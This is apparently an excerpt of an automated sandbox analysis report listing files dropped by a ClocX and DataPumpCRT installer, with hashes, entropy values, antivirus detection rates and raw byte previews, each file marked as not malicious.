SSDEEP:	96:mzWFPsX5MewbZxnvkQRti2glLf0KpyhF7YdBF2eKAtFjP:ma+MewzkKglLf0Kpzy47
MD5:	FEDC74E595F352049284195DE8E75F09
SHA1:	8CF9D3E2D8152D843122358E10F43A66935EA5AD
SHA-256:	1F4A7272783E4A28B0BB7A73CF832F75D0D1358A99555A1F84C9CECD52D2A227
SHA-512:	0E78BC04BC8C56AA886F0E02BE30B34B4B6EC2415801CF1DF0EB5A2A4465D71120AB71C88B778A429B4CFD55E2F06279DAD8B513B5F41E6061F9F8055F717C59
Malicious:	false
Preview:	RIFF....WAVEfmt ....................data....G.j.hqG..Yn;..[e=t..FM...V....m&.....q.../gy\|.MYwy.pXvg.bvL..s.>..p.)e.\|.IX...V7.\|..D.q..Cya..Vw\..htYd.v.dO...z7....2....Ag...Ya}t.w[wb..bvJ..s.F....;e...MP...e>....C.y..Fng..Xg^..yp^h..w_M...q:....8\|...D\...aS...yRnn..YkX..hnO..}yGm...XY...eC....Dv...Mjy.._\d..ye_p..nbY...mJ....Iv...L[...dO\|..}Pm...^dh..ne\...mRp...[^...gP...\|Jn...V^...kVm..._bz..k_j...eY...nSn...X[...jSz...Uh...bYz..wYh...a^v..p\e...eYz..tYg...dY...vSt...Va...hXw..\|Yh...dbk..te^...qYt...^_...gO...}Lq...Xe...g[m..\|bgt..mha..zpR...\|Ps...U[...hR....Mv\|..Xkk..jnd..ys^j..\|dU...qI....Fv...Rh...b\\|..._vm..aq[..nvM..y.Rq...YV...qO....I.\|..Oqm..^pj..pnde..ynR..}zF....Fz...Rj..._X.w.}X.h..Yz^..h}R..q.Yp.}.aU...yL....C.}..Jvt..^ttz.nkmb..vwR..w.I....Fw...Ug.\|.dU.v..U.h..U.b..b.Y..p.am.y.eR...yG....D....Jsy..^p\|w.qkyd..p}U..p.M..w.Jt.\|.\g.}.hS.w..U.m..V.j..a\|a\|.m}eh.w.jU...\|M....J....Rs...em.w.tgyg..jzY..m.U..w.Ut.}.dh...mV.\|..X.v..[}p..bvgy.q\|mk.}\|n[....U....S....[p...kj.y.vawm..j

C:\Program Files (x86)\ClocX\Sounds\clockbell.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 32 kbps, 11.025 kHz, Monaural
Category:	dropped
Size (bytes):	12746
Entropy (8bit):	7.867655419483201
Encrypted:	false
SSDEEP:	192:iUmkPm5hJwn66NNF7I/b+aMcErEsgneaOaGZHReTKNlEvLkzu6462qvpS34Ocgt+:iHGmfCxqi/cErInATx5mLYu6AOOcfr
MD5:	F29BE0977BEF501F9CC2EB3473A7EC03
SHA1:	FA32D1AE499B0726E98266EEF416F288C5E43C8D
SHA-256:	11F4A5755D5ABFC2E6470C1DF2CB67983CCCAD1F5AF8C16E8A0B47321A862FCD
SHA-512:	8AB63C7FC1151F12625624092948F763BA22215D9DC0263D372FDEEFC70E14D1A9992D10D655D7778DCA936BE50842780FE7807D30605FEA295CC30FD58767EB
Malicious:	false
Preview:	..@..........Info.......<..1.............""&&..337;;@@DHHLLQUUYY]bbffjnnssw{{......................................................:LAME3.96 .7.....4... $..".. ..1..3P4.........................................@..+..D.X...F),r.n_0...x..Y..:...19..t..A..k.`.S.. ....n.@8..CH...G.....S....Ha.5......qL.QM"..b8..eq.N.....bY.{\|.y.?...q,.....B..d.}..!..g3.$bY.%.wT..f4.......r.. ............} .......@ ......i...B..0r.._......p....\V..G...g]. Xv.....'.eQ..h....8.......(.L..]........\|...(.Mc7.D...#...-.<Pv}.us6..H. 6.9.y.k..n.w.........k......5...p.~S.......v_...............$......?.=_I/...%...Y..w&.$.N....K......B..1s.....HH..E...&.@........."...tdI.+P.~...F..(Y..z.,R.aA0..s...32>u. L..r..>.H..d.1"..$..]....`.....{<.5..&%.......ti..S-Tl.Ff..AN.i...M...$.PZ).4'L.7:t.jO3e..d......(...N....;......Z......9...B..0.r.......Q..aFP.I.fU!@y.*.nH&z...@Z.....L.......N..w.[4..&+...-.6P../...nj.....Jb.T.a..;........D.%..~...>f.+ p..~..?K..?.vI....QOu.K...ZS1.\|}@....,...jY

C:\Program Files (x86)\ClocX\Sounds\ring.wav

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
Category:	dropped
Size (bytes):	10026
Entropy (8bit):	6.186386196222228
Encrypted:	false
SSDEEP:	192:AHTBu49v6XhLYxXnIt6cFg9RdpVBFx3HYIQ04PpQlAZfu17QfW/Dtsy:0T19yRLYdnIt9+hpVBX3M00QlOGQfGDt
MD5:	5549AF0CBB0CC2F1AB1A1DD52AC3531E
SHA1:	22E51923C9365EDB643B68AFBC8C44D0DA25112A
SHA-256:	F32A30899D104EF03CDBDA1D433015982CE34EA1D58481C1E437D56C92D2F5C6
SHA-512:	870F6A04AF68BD68A8922972399FF5609D06CDD92B3D785E05B71BA60929B6D0CD380FC5C5365DEE26F69D9C84D85C34A57EA51C8D41D96A06FEFCB044B4AAE3
Malicious:	false
Preview:	RIFF"'..WAVEfmt .........+...+......data.&..{0e....vS<zz..jtnP....u.u..Vu.x...lGzq...j>v...z.M].o..l....[.bz...zAex....RD.t..}.fs.k.vk.v..Wke....a<ua....X\ok..t._p.s.s..{.{S._....e\e]....X[zy....].~d.fx...uigK....gSji....Ryvf....v.x}.Q....yZk\....`u\Z...~]~y..Xxsl..xyUsv..z.g>....{.g}.`.._....`sb....s/p}....UW.f..f.vs.k.jy....Cso....`Do[...`Pqt...._.._.uy...gIsL...fG[`....M_.`....u.ya.I....v.k[.x..lduup....Kq.u...ie.[s....o..nXu..~.HRet...[LaZ....uazy..z....elqy...}UdS{....Zbn....tn.pu.~....ZiUi....\UU....sZvf....}..f.ki....i\Sz....VjX{...olk`..u.~..xq[s....\iUl....qjQ.....q}s.}..}..izde....sj=u....e`Z{~..j.{b.zk....xnQp....`ngs...}s.[..o....x.Z`....adSf....byRv....y.o.lf....so`j....nyZk....up[..v.zy.pxns.}..l.Q_....~kM.....y.k....z..n.ki.....xGv.v..kxLl...x.uU.uk...~t.X{.p..v}Vu.....uV......sk.o..g..z.uvq..z..Gz.....of.p..f.xb.z.yt.s..\{.t...q[~`..y.xX~...y.bz.l..g....b{Wy....Wnn....]b.j..v.q.}l.ak.u..gtf....n_.b....n..z..~.o..{.k..z..b.[}...}{b=....nvuu....f.n_.s....g.{i......zf.

C:\Program Files (x86)\ClocX\Sounds\ring2.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 32 kbps, 11.025 kHz, Monaural
Category:	dropped
Size (bytes):	6686
Entropy (8bit):	7.823729077076571
Encrypted:	false
SSDEEP:	192:gFG+4dGvjjICGxrvRRIOHmEaS4VwpZo0TuoMa:gFG5QfIxxrpRIOGBS4Vw4auda
MD5:	FFE63755C41C834CAA3D4967D099108C
SHA1:	B3C86A2FBA4123DC1A107328B810C64A12280936
SHA-256:	F6F4AD8F998096B329677BCE8CC1DB37B6923C5DE6761328DD5C3EF6A49CE892
SHA-512:	A60C988C41B0642D9BEC0D6E3230C1B18A26E0558D7E0864902B48C09E447114E1CB5ECF7625B9512D0094E300676B5AD73BC10ACDFFD32DBBE425FCD584AF25
Malicious:	false
Preview:	..@..........Info......................!!!))))111999BBBJJJJRRRZZZccckkkssss{{{......................................................:LAME3.96 .7......... $..".. .....N..........................................@...Y..`..0.C^.....R.....z.sJ#.Z}s...N!{...x.+.<..D..n..n.\........<.v3....J.AAAAC...C%..w...\..^...w.^..X8P.qqs..\....\..r........<.....[........./i.A.S.../{.....!.7..t3 <4].pD..-k.Zg..\.....X.8..B..0.Y..x....$30t.....7.N0.V.2iC1xf......&.S..6e<....j:Mr^S....r..;m..$+D. ...a..K<.c.m..$.R...RPN...(..$..R;@......i...SP.u.e[.I.+.&..-......NO7.......Dd....(....$-.-.l-...[..yL?.}.........-..>Z.?e..B..1$]..OH.i.+$5i....2....J.....S@...$.nS.09%.. ..j.Q.s.%.m.a&.....&..Ia.r..)..=np......g..=.7.....n....G.A.L.]zp..1Zb%.#.@...[M....P..l..r..w.f8...U.@M..5.E.h.I.&J.B.....M....P..>.._.g...".fm.3..B../.v...`...6....9.3.I..4.....1..s...].e......*..dtrh..UF..Y.^]..]..n.:...z5.h..y{..[2<...t.B.\|....r.f....].2.1...\."v.9.A.{.(.04...E....\|...I.......)2.

C:\Program Files (x86)\ClocX\Sounds\siren.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 24 kbps, 8 kHz, Monaural
Category:	dropped
Size (bytes):	8208
Entropy (8bit):	7.8522466183279285
Encrypted:	false
SSDEEP:	192:5bcKdv2kGc5TguhA4i+Xguk4bAhwZbA7HThwkK0N5KIzA9j04cn:5B2Y5Tguh/guAwZbAr191IJcn
MD5:	59966D556E3973DAB3FA5B70683C3729
SHA1:	9E6A68D02C46F86C17B310A87FD9B6C1C3FC1B12
SHA-256:	CE8B62E4D4F14D50861EB57F67107556984F06C85F6EB3A6208DD2E42B027452
SHA-512:	27280A5FB62D3D8E0B6FDEBAD8941E783F13D850B848FF485A2B65A41CE7607384039CE8970B7D0F55EF268416CCDAEEF0332E9275E90167F29376EB51131D01
Malicious:	false
Preview:	..8..........Info.......%.. ............""")))00777>>>EEELLSSSYYY``gggnnnuu\|\|\|......................................................:LAME3.96 .(.....8....$.."..... ......................................................8..-s.!F`.A...d.L.......y0.:&.F.M6....#?..F..gkk..R........9....4..X.5..f~..b.l.g^.Jj.u..7..)I.....4....Q}.......,.s......9.^..Z..";.......`.gN6....,.u.)I.&fff.33I..w....?.....=.`0.......`0......rX..8..1..._...b....T...kV._..2.{.$h.q".U5.AM2...P.......@....-V...[6Y8..........D. .,.~.o...-...X..$.>.X*..../.9.Y......+.@k.. .\|..1...Uo......6...{0.$...".@X.z....\D._B.'qJ."...o.._g.....J......^.kp`.Q.l.Z....<$..8..3.R.E.x..-..h..zMXNU._o..c...t..b..x,..:uB\^..W."6mzoX..%!...:.z.6~.X.1h..~.E....6k...r.4.Z...$....um..#=.+#..W..G.u.....k...:...3^....y;...\..N..Y...j.5......?..HW.~.4.o....k.e.Mo~.jX..Rp..L.dYG....p.%..8..1tJ.....S2...8..;.A..8..........R..+.$@..A.....$.6..>.....I......h....<d\|]?.d(.Kti.5...V....P:...F.A:........t..t.X

C:\Program Files (x86)\ClocX\Sounds\trumpet.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MPEG ADTS, layer III, v2.5, 24 kbps, 8 kHz, Monaural
Category:	dropped
Size (bytes):	18360
Entropy (8bit):	7.907116897949521
Encrypted:	false
SSDEEP:	384:O4aEJEp87W0A3vAADh+9gZCh4UzWEuZ8l9E9Zsjjh3m5:O4Hh7WL37z6zWEueb3Q
MD5:	A8543F9F3BCA2D1D1E610A2255644CA9
SHA1:	A94B4154825BB1EEE6704FAD78AFC4ECE10BBCCE
SHA-256:	04B44BD2F0D96D81475F9E5D18C20AA70B37C77F1F60570FF448DA25A9C78754
SHA-512:	AC700D10B8102898961BCB574A84FA88238C749F8941E16A0B58C9E3AC6E39488DA1D515B1393A4232470AE9ECF14AD43AB74BC91606EC3013211C577276B09E
Malicious:	false
Preview:	..8..........Info.......T..G.............!!$'-00369<@@CFILORRUX[^aadgjmppsvy\|......................................................:LAME3.96 .(.....Z....$..".....G......................................................8..,..d!F@...2... @..#..."#.. @..3.DG{.&...@..Jqqs..D..1%....ww..w...2.P......... ..7......"%\|......{............&.....p...."""......."'%.`.....(e.....""#....4..=.....7.....1........`@h4......pp.........74....8..3.Z._.h.y$]o..(..hb`d9......&.=.F.....R..x..1......2.@U.Y..X......!...7......&....FP....H..o.\|.!s..V....Q2.\|..A.......8... ;......).F.....p.d........L.. @P...c...Y.(..h.)..s...@.w.D9RQ.V..U.U>...".Y<.......8..3........L.....u.....^$.e....... (..K{.....:H.J.$g..Z.$...2.........j[QY.....$L.H.{(.z.JY.P.1wY..... ;..(.1.. d 0..j`....dU..%U".<.%.......Q<....d..D.q!..`>7S......tT...I)#g../..F.Dd).U,......ac..o.Oa.-U.....8..2.^.5.x....nf..K......<.e..}.d/..1`.1).[..{g{.I..!VUVk.u.R&.c..=7.........'......g:.q....\|.{j.h.....-+I...HQ../.J....Q

C:\Program Files (x86)\ClocX\uninst.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	53876
Entropy (8bit):	5.750302372670251
Encrypted:	false
SSDEEP:	768:EGn4o4BL/akfpI1nu0LXGS8BPfeyWMZtuHvwbtOuIYdPc+92TUXr6fJkdn:D4hwgonu0fJytuPwbdNc+9aUXr6fJon
MD5:	3387961372FE91C2CC69B53180CBFEE4
SHA1:	EDE6FB0D2319536EFCA218D461425D2ADDFFD88E
SHA-256:	DAD57975BE6833C50D32EE77212ADDF11A80195D82365ADE6042234E492BD845
SHA-512:	F6551803B90934A5555587BC81B4758B21FC8BAD1653F298846E2195C797932893D761249F9CF527E95809FFC0BFD785872F0B42F56E8ADC64BDB06C63F09C5C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L...a.d.................d...........3............@..........................0............@.................................0............L...........................................................................................................text...jb.......d.................. ..`.rdata..4............h..............@..@.data...8............\|..............@....ndata.......P...........................rsrc....L.......N..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	337408
Entropy (8bit):	6.515131904432587
Encrypted:	false
SSDEEP:	6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
MD5:	62D2156E3CA8387964F7AA13DD1CCD5B
SHA1:	A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
SHA-256:	59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
SHA-512:	006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..\|...\|...\|...p...\|...w...\|.d.r...\|...v...\|...x...\|.i.#...\|...}.\|.\|.d.!...\|...w...\|..V....\|...v...\|.......\|. .z...\|.Rich..\|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\COPYING.LGPLv2.1 (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	26526
Entropy (8bit):	4.600837395607617
Encrypted:	false
SSDEEP:	384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
MD5:	BD7A443320AF8C812E4C18D1B79DF004
SHA1:	37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
SHA-256:	B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
SHA-512:	21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
Malicious:	false
Preview:	GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	214016
Entropy (8bit):	6.676457645865373
Encrypted:	false
SSDEEP:	3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
MD5:	2C747F19BF1295EBBDAB9FB14BB19EE2
SHA1:	6F3B71826C51C739D6BB75085E634B2B2EF538BC
SHA-256:	D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
SHA-512:	C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	127669
Entropy (8bit):	7.952352167575405
Encrypted:	false
SSDEEP:	3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
MD5:	75C1D7A3BDF1A309C540B998901A35A7
SHA1:	B06FEEAC73D496C435C66B9B7FF7514CBE768D84
SHA-256:	6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
SHA-512:	8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149845
Entropy (8bit):	7.893881970959476
Encrypted:	false
SSDEEP:	3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
MD5:	526E02E9EB8953655EB293D8BAC59C8F
SHA1:	7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
SHA-256:	E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
SHA-512:	053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34392
Entropy (8bit):	7.81689943223162
Encrypted:	false
SSDEEP:	768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
MD5:	EA245B00B9D27EF2BD96548A50A9CC2C
SHA1:	8463FDCDD5CED10C519EE0B406408AE55368E094
SHA-256:	4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
SHA-512:	EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	5.956401374574174
Encrypted:	false
SSDEEP:	96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
MD5:	B3CC560AC7A5D1D266CB54E9A5A4767E
SHA1:	E169E924405C2114022674256AFC28FE493FBFDF
SHA-256:	EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
SHA-512:	A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7910
Entropy (8bit):	6.931925007191986
Encrypted:	false
SSDEEP:	192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:	1268DEA570A7511FDC8E70C1149F6743
SHA1:	1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:	F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:	E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................\|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11532
Entropy (8bit):	7.219753259626605
Encrypted:	false
SSDEEP:	192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:	073F34B193F0831B3DD86313D74F1D2A
SHA1:	3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:	C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:	EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite.............................`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\...S...s..$..........o..y..........,.........-..X.....v.M1..'...5R.4..8k!..q.=BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z..).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39304
Entropy (8bit):	7.819409739152795
Encrypted:	false
SSDEEP:	768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:	C7A50ACE28DDE05B897E000FA398BBCE
SHA1:	33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:	F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:	4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
